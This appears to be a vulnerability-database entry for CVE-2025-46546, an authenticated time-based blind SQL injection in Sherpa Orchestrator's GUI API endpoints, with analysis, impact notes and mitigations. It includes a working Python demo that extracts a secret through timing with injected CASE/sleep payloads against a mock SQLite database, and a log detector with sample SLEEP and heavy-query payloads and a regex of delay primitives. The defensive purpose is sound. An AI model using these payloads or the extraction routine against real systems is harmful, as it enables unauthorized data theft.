
CVE-2025-46546: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Sherpa Orchestrator

Medium
Published: Fri Apr 25 2025 (04/25/2025, 00:00:00 UTC)
Source: CVE
Vendor/Project: Sherpa
Product: Orchestrator

Description

In Sherpa Orchestrator 141851, multiple time-based blind SQL injections can be performed by an authenticated user. This affects /api/gui/asset/list, /api/gui/files/export/csv/, /api/gui/files/list, /api/gui/process/export/csv, /api/gui/process/export/xlsx, /api/gui/process/listAll, /api/gui/processVersion/export/csv/, /api/gui/processVersion/export/xlsx/, /api/gui/processVersion/list/, /api/gui/robot/list/, /api/gui/task/export/csv/, /api/gui/task/export/xlsx/, and /api/gui/task/list/.

AI-Powered Analysis

Last updated: 06/24/2025, 11:57:29 UTC

Technical Analysis

CVE-2025-46546 is a medium-severity SQL injection vulnerability (CWE-89, improper neutralization of special elements used in an SQL command) in Sherpa Orchestrator version 141851. The thirteen GUI API endpoints listed in the description build SQL statements from request parameters without neutralizing them, so an authenticated user can inject SQL into the asset, file, process, process-version, robot and task listing and export (CSV and XLSX) operations. The injections are time-based and blind: the application returns neither database errors nor the value of an injected expression, so the attacker appends a conditional delay (the backend's sleep or heavy-query primitive) that fires only when a chosen predicate about the data is true, and reads the answer from the response time. Each request yields roughly one bit; a binary search over character values recovers arbitrary strings from the database (credentials, tokens, configuration) with a handful of requests per character. The price is a large number of requests per value, which is also what makes the technique visible in access logs. Exploitation requires valid credentials, so the attack surface is limited to Orchestrator users and to anyone holding their sessions, but the injected statements run with the privileges of the application's database account rather than of the logged-in user, so a low-privileged account may read data the GUI never exposes and, depending on the database and its permissions, modify it. At the time of this analysis no public exploit is known and no vendor patch has been published; the CVE was reserved on 2025-04-24 and published on 2025-04-25, and the record has been enriched by CISA.
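The following is an added example (not code from Sherpa or from the CVE record) of the technique described above, run against a hypothetical search filter of a list endpoint. The CVE names the endpoints but not the injected parameter, the query text or the backend engine, so the example assumes an in-memory SQLite database with a registered sleep() function standing in for the engine's native delay primitive (SLEEP(), pg_sleep(), WAITFOR DELAY); the table, column and secret value are constructed sample data. It recovers a token using only response times, then shows that the same payload sent through a parameterized query never reaches the delay.

```python
"""Time-based blind SQL injection against a hypothetical list endpoint,
next to the parameterized query that closes it.

Added illustration, not Sherpa code: the injected parameter ('search'), the
query, the tables and the secret are assumptions; sleep() is a registered
SQLite function standing in for a real engine's delay primitive.
"""
import sqlite3
import time

DELAY = 0.05            # seconds the injected sleep() blocks the query
THRESHOLD = DELAY / 2   # response time above which a probe counts as "true"
SECRET = "tkn-7f3a"     # constructed sample value the attacker wants to read
sleep_calls = {"count": 0}


def _sleep():
    """Stand-in for SLEEP()/pg_sleep()/WAITFOR: block, and record the call."""
    sleep_calls["count"] += 1
    time.sleep(DELAY)
    return 1


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 0, _sleep)
    conn.executescript(
        "CREATE TABLE asset(id INTEGER, name TEXT);"
        "INSERT INTO asset VALUES (1, 'robot-01');"
        "CREATE TABLE settings(api_token TEXT);"
    )
    conn.execute("INSERT INTO settings VALUES (?)", (SECRET,))
    return conn


CONN = make_db()


def asset_list_vulnerable(search):
    """Hypothetical vulnerable handler: the filter is spliced into the SQL."""
    sql = f"SELECT id, name FROM asset WHERE name LIKE '%{search}%'"
    return CONN.execute(sql).fetchall()


def asset_list_fixed(search):
    """Same query with a bound parameter: the filter cannot change the SQL."""
    return CONN.execute(
        "SELECT id, name FROM asset WHERE name LIKE ?", (f"%{search}%",)
    ).fetchall()


def probe(expr, threshold, handler=asset_list_vulnerable):
    """One blind probe: True iff the response was slow, i.e. expr > threshold.

    The payload closes the LIKE literal, adds a conditional delay and comments
    out the rest of the statement; the server's response body never changes.
    """
    payload = f"%' AND (CASE WHEN ({expr}) > {threshold} THEN sleep() ELSE 0 END) -- "
    start = time.perf_counter()
    handler(payload)
    return time.perf_counter() - start > THRESHOLD


def binary_search(expr, lo, hi):
    """Recover the integer value of expr in [lo, hi] with about log2 probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(expr, mid):      # slow response means expr > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret():
    """Read settings.api_token one character at a time from timing alone."""
    subq = "(SELECT api_token FROM settings)"
    length = binary_search(f"length({subq})", 0, 64)
    return "".join(
        chr(binary_search(f"unicode(substr({subq}, {i}, 1))", 32, 126))
        for i in range(1, length + 1)
    )


def parameterized_is_safe():
    """The same payload through the fixed handler never invokes sleep()."""
    before = sleep_calls["count"]
    rows = asset_list_fixed("%' AND (CASE WHEN 1 THEN sleep() ELSE 0 END) -- ")
    return rows == [] and sleep_calls["count"] == before


if __name__ == "__main__":
    print("recovered:", extract_secret())
    print("parameterized handler immune:", parameterized_is_safe())
```

Recovering the eight-character token takes roughly sixty requests, about half of them delayed, which is the traffic pattern defenders should look for: many calls from one session to one endpoint, bimodal in latency, with near-identical parameters.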

Potential Impact

For European organizations running Sherpa Orchestrator 141851, the vulnerability threatens the confidentiality and integrity of the data the platform holds. The affected endpoints manage assets, files, processes, robots and tasks, so the database behind them holds operational data about automated processes, possibly credentials or files the robots use, and personal data subject to the GDPR. Because the technique is blind, a patient attacker can walk through the database over hours or days without producing a single error or unusual response body, so exfiltration can go unnoticed wherever only errors and response content are monitored. If the application's database account permits writes, process and task records could be altered, disrupting workflows or causing robots to act on bad data. Availability is affected indirectly: every probe deliberately stalls a query, so a sustained extraction also consumes database worker time. Since exploitation requires authentication, the primary vectors are insider misuse and compromised or phished user credentials, which is why access control and credential hygiene matter as much as the eventual patch. The medium rating reflects the authentication requirement weighed against the breadth of data reachable through thirteen endpoints. Organizations in sectors such as manufacturing, logistics and IT services that automate business processes with Sherpa Orchestrator are most exposed, especially where no compensating controls or monitoring for anomalous query patterns are in place.

Mitigation Recommendations

1. Restrict access to the Sherpa Orchestrator APIs to the users who need them, and require multi-factor authentication so that a stolen password alone does not yield the authenticated session the exploit needs.
2. The only complete fix is in the application: each affected endpoint must pass request parameters (filters, identifiers, export selections) to the database as bound parameters of prepared statements, with values that cannot be bound, such as sort columns, checked against an allow-list. Until Sherpa ships such a build, a WAF with rules for the listed endpoints raises the cost of exploitation but should not be relied on: a time-based payload needs only one conditional expression and a delay or heavy-query primitive, and encoding and comment tricks hide those from signature rules.
3. Monitor for the technique rather than the payload: bursts of requests from one user to one of the listed endpoints with response times far above that endpoint's baseline, typically alternating between fast and slow with near-identical parameters. On the database side, a statement timeout shorter than the attacker's delay turns each probe into an error and removes the timing channel.
4. Audit user privileges in Sherpa Orchestrator and enforce least privilege, so a compromised account reaches as few endpoints as possible; apply the same principle to the database account the Orchestrator uses (access only to its own schema, no file or OS-command functions), since injected statements run with that account's rights.
5. Engage Sherpa support channels for a fixed build and apply it as soon as it is available.
6. Segment the Orchestrator and its database from the wider enterprise network to limit lateral movement if the host is compromised.
7. Update incident response plans to cover SQL injection against automation platforms, including how to determine from logs which data a probing session could have reached.
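As an added example for the monitoring recommendation, not part of the advisory or of any Sherpa product, the following script runs a two-part detection over constructed access log lines for the endpoints named in the CVE: a token match for the delay primitives of common engines (the weak half, since attackers can encode or alias them away) and a payload-agnostic count of abnormally slow requests per user and endpoint. The log format (user, method, path with query, status, latency in milliseconds), the latency threshold and the hit count are assumptions to adapt to the proxy or application logs actually available.

```python
"""Flag time-based blind SQL injection attempts in access logs for the
endpoints named in CVE-2025-46546.

Added example, not part of the advisory or of Sherpa Orchestrator. The log
format, the latency threshold and the hit count are assumptions; the sample
log lines are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Endpoints from the CVE description, normalized without a trailing slash.
AFFECTED = {
    "/api/gui/asset/list", "/api/gui/files/export/csv", "/api/gui/files/list",
    "/api/gui/process/export/csv", "/api/gui/process/export/xlsx",
    "/api/gui/process/listAll", "/api/gui/processVersion/export/csv",
    "/api/gui/processVersion/export/xlsx", "/api/gui/processVersion/list",
    "/api/gui/robot/list", "/api/gui/task/export/csv",
    "/api/gui/task/export/xlsx", "/api/gui/task/list",
}
# Delay primitives of common engines; the CVE does not name the backend, so
# all are listed. Signature matching alone is bypassable by encoding.
DELAY_TOKENS = re.compile(r"\b(sleep|pg_sleep|waitfor|benchmark)\b", re.I)
SLOW_MS = 2000        # assumed: far above a normal list/export latency
MIN_SLOW_HITS = 5     # slow calls by one user to one endpoint before alerting

# Assumed format: "<user> <method> <path[?query]> <status> <latency_ms>"
LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def parse(line):
    """Parse one log line into a dict, or return None for unparseable lines."""
    m = LINE.match(line)
    if not m:
        return None
    user, method, target, status, ms = m.groups()
    path, _, query = target.partition("?")
    return {"user": user, "method": method, "path": path.rstrip("/"),
            "query": unquote_plus(query), "status": int(status), "ms": int(ms)}


def analyze(log_text):
    """Return alerts in log order:
    ('payload', user, path)     a delay primitive is visible in the query string
    ('timing', user, path, n)   n abnormally slow calls, whatever the payload
    """
    alerts, slow = [], defaultdict(int)
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None or rec["path"] not in AFFECTED:
            continue
        key = (rec["user"], rec["path"])
        payload_alert = ("payload", *key)
        if DELAY_TOKENS.search(rec["query"]) and payload_alert not in alerts:
            alerts.append(payload_alert)
        if rec["ms"] >= SLOW_MS:
            slow[key] += 1
            if slow[key] == MIN_SLOW_HITS:   # alert once, when the threshold is hit
                alerts.append(("timing", *key, MIN_SLOW_HITS))
    return alerts


# Constructed sample: normal traffic, an obvious SLEEP() payload from mallory,
# a keyword-free heavy-query probe loop from eve, and one slow legitimate export.
SAMPLE_LOG = """\
alice GET /api/gui/task/list/?page=1&size=50 200 120
bob GET /api/gui/robot/list/?sort=name 200 95
mallory GET /api/gui/asset/list?search=%25%27+AND+%28SELECT+SLEEP%285%29%29--+ 200 5012
mallory GET /api/gui/asset/list?search=%25%27+AND+%28SELECT+SLEEP%285%29%29--+ 200 5008
eve GET /api/gui/task/list/?search=a%27+AND+%28SELECT+count%28%2A%29+FROM+t+a%2Ct+b%2Ct+c%29%3E0--+ 200 5100
eve GET /api/gui/task/list/?search=a%27+AND+1%3D2--+ 200 40
eve GET /api/gui/task/list/?search=b%27+AND+%28SELECT+count%28%2A%29+FROM+t+a%2Ct+b%2Ct+c%29%3E0--+ 200 5090
eve GET /api/gui/task/list/?search=c%27+AND+%28SELECT+count%28%2A%29+FROM+t+a%2Ct+b%2Ct+c%29%3E0--+ 200 5120
eve GET /api/gui/task/list/?search=d%27+AND+%28SELECT+count%28%2A%29+FROM+t+a%2Ct+b%2Ct+c%29%3E0--+ 200 5105
eve GET /api/gui/task/list/?search=e%27+AND+%28SELECT+count%28%2A%29+FROM+t+a%2Ct+b%2Ct+c%29%3E0--+ 200 5098
carol GET /api/gui/files/export/csv/?ids=1,2,3 200 6500
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

On the sample, mallory is caught by the token rule on her first request, eve's heavy-query probes contain no delay keyword and are caught only by the slow-request count, and carol's single slow export is below the hit threshold, which is the trade-off to tune: exports are legitimately slow, list calls are not, so a per-endpoint baseline beats one global threshold.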


Technical Details

Data Version: 5.1
Assigner Short Name: mitre
Date Reserved: 2025-04-24T00:00:00.000Z
CISA Enriched: true

Threat ID: 682d983fc4522896dcbf053d

Added to database: 5/21/2025, 9:09:19 AM

Last enriched: 6/24/2025, 11:57:29 AM

Last updated: 8/16/2025, 1:57:50 AM

